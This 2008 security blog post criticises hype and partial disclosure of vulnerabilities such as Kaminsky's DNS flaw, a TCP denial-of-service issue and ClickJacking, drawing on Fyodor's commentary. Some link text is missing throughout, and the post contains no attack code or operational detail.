Cutting through spin of vulnerability disclosures

17.10.2008
There are a few highly publicized vulnerabilities at the moment which haven't completely been disclosed and which, it is claimed, could . Only, when the vulnerabilities are finally disclosed, it seems that the whole incident has been somewhat Chicken Little.

There is that the self publicity and public grandstanding is beginning to hurt the whole idea of open disclosure and mature handling of vulnerabilities. Disclosing at a conference might help the conference organizers and be seen as a publicity boost to the presenter / discoverer, but are we to expect the average Information Security practitioner to attend every Information Security conference on the off chance that a self-aggrandizer will be presenting information on a vulnerability that may or may not actually be relevant?

Setting aside the venue for disclosure, the actual content of the vulnerabilities that have been disclosed via partial disclosure in recent months has not been enough to support the idea that partial disclosure is what we're going to have to get used to. This is especially the case once the hype circuit has been allowed to build up to the point that it seems the world is going to end if we all don't suddenly run out and fix the problem that has no public solution and no public definition.

If "" and Daminsky's are anything to go by, the idea that not disclosing is going to hide anything from the "bad guys" falls flat on its face. The same can be said of the and Web application appliance vulnerabilities that are also being bandied about at the moment. What the discoverers tried (and are trying) to hide was quickly worked out by others who publicly speculated on open mailing lists, and enough information was leaked in the partial disclosures and online demonstrations (where they were provided) to give enough to go on for suitably skilled "bad guys" to find and target. Unfortunately, the baseline skill level required to find the vulnerability isn't high enough to effectively claim that the partial-disclosure works. Fortunately, there are plenty of script kiddies out there who are too lazy and unskilled to be able to find it on their own, but it only takes one who can in order for the approach to fail.

One of the most respected voices in Information Security, Fyodor, has singled out the , using it to voice his displeasure at the increasing use of the non-Disclosure as a means of disclosing vulnerability data. Fyodor's opinion on partial disclosure is simply stated as "put up or shut up!".

Looking at the TCP Denial of Service vulnerability that has only partially been disclosed (Full Disclosure , later this month, at a Security Conference), Fyodor's assessment (and that of others) is that it has all been seen and done before - mostly by people who then didn't run around claiming the world was going to end. Fyodor steps through and explains how his particular take on the vulnerability (at least how he sees it) works and how it achieved the same goals.

Before going any further, it is important to point out that two completely different vulnerabilities can have the same end effects on a system. The vulnerabilities don't need to be related in any way for this to be the case, but, commonly, it is seen that independently working individuals and groups will often come to the same result through different methods. It may even be the case that they share a common starting point and end up in different locations, but the vulnerabilities end up being separate. Microsoft recently provided an when their due diligence on a denial of service vulnerability turned up a much worse code execution vulnerability.

Fyodor's approach to the TCP vulnerability relies upon a companion tool to his Nmap security scanner, that he called Ndos (Network Denial of Service). Basically the tool forced a denial of service against listening TCP services by exhausting the resources available on the host system. As Fyodor points out, there are many different ways to achieve this sort of attack and there are even variations which result in the system requiring a reboot, such as claimed by the recent partial disclosure.

Fyodor points out that variations of this style of attack have been public since early 2000 and may very well have been around for a while before that.

While it might seem like the world is ending based on the new yet-to-be-disclosed issue, the reality is that the countermeasures are almost the same as for any other network denial of service attacks. You find and isolate the attacking IP(s) or add extra capacity to your hosting and networking systems. Anything that the vendors can add beyond that is going to be extra usefulness, but it should always be assumed that the systems being protected are impotent as far as self protection in their default state is concerned.

A response to Fyodor's commentary has by those behind this discovery, along with that don't really do anything to clear up the confusion over the issue (though they do deliver the equivalent of a limp slap on the wrist for the coverage that has been woefully inaccurate and fear mongering).

Once Pandora's box has been opened, you can't really close it by telling everyone else to just be patient and not provide more details along the way.

On the other hand, ClickJacking, the that was finally disclosed last week after Adobe released a , was found to be nothing more than a problem that many beginning Web designers stumble across when learning about Z-Indexing on Web sites (it is that there are some other issues that have also been discovered, but they fall more into the realm of blended vulnerabilities that are more ). After all of the hype and buildup that preceded the disclosure, the actual disclosure could be seen as a significant letdown for the researchers behind the (re)discovery, RSnake and Jeremiah Grossman. Rather than cut out a demonstration that targeted a weak application (Flash), the entire initial presentation was dropped, which surely contributed to the overall hype cycle (and which could have stopped it dead in its tracks if it was actually delivered).

It seems strange that two of the strongest names in Web security would be caught out hyping a set of vulnerabilities that have been known about for more than five years, but it does go to show that even in the fairly narrow field of Web security (as part of the overall Information Security sphere) it is still possible to discover something "new" that is actually several years old, and that applications can still be vulnerable to it.

As with the other partial disclosures to date, you're going to have to wait until the next round of security conferences to find out more (have you noticed a trend, yet?).

As with Kaminsky's DNS flaw that has preceded them, it seems that nothing really new has been thrown up by these recent partial disclosures. What it should highlight is that there are going to be more problems affecting core Internet technologies (some of which Fyodor mentions) that are going to regain attention, which isn't necessarily a bad thing.

For people already well versed in the technologies being targeted, a lot of it is going to elicit the response of "well, duh, we already knew that". A response to that will be "Well, why haven't you done anything about it, then?".

Unfortunately for everyone, some of these technologies have become an essential part of our everyday existence and there really isn't anything better out there to replace them with. Even if there was, the cost to completely replace them would be likely to put the economic bailouts to shame. Others have the problem that the very feature that makes them so useful is the same one that the vulnerability researchers are trumpeting as being weak, except there isn't really another way to do the same thing.

To some readers this might read like some sort of mid to late 90s "manifesto", but fair's fair if vulnerability researchers are resurrecting old vulnerabilities from that sort of timeframe (the posturing is also eerily reminiscent of that time).